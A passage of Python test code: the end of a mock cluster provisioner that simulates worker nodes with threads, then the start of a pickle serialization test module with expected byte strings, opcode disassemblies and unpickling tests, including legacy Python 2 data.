return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
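# Each mock node is backed by a Worker: a thread that pulls job IDs off the
# shared job queue, reports them on updatedJobsQueue, and marks itself busy
# for secondsPerJob to simulate doing the work.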
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, forget,
)
from test.support import threading_helper
from test.support.warnings_helper import save_restore_warnings_filters
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
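# For example, opcode_in_pickle(pickle.PROTO, b'\x80\x04N.') is True, since
# that pickle starts with the PROTO opcode (0x80).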
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H(object):
pass
# Hashable mutable key
class K(object):
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of an old-style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Also try with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
